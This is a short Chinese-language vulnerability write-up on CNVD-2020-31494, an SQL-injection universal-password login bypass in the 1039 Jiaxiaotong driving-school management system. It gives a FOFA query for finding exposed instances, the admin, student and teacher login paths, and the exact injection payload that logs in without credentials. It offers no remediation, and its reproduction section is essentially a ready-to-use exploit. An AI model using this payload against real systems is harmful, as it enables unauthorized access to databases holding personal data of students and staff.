# 1039家校通 万能密码绕过 CNVD-2020-31494
## 漏洞描述
北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。
北京1039科技发展有限公司驾校管理系统存在万能密码绕过漏洞,攻击者可利用该漏洞获取数据库信息。
## 漏洞影响
> [!NOTE]
>
> 1039家校通 v1.0 – v6.0
## FOFA
> [!NOTE]
>
> title=”学员登录_1039家校通”
## 漏洞复现
管理员登录接口为
“`
/admin/Product/Comstye.aspx
/Student/StudentLogin.aspx
/Teacher/Index.aspx
“`
账号密码为如下即可登录
“`
user:peiqi
pass:’ or ”=’
“`
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容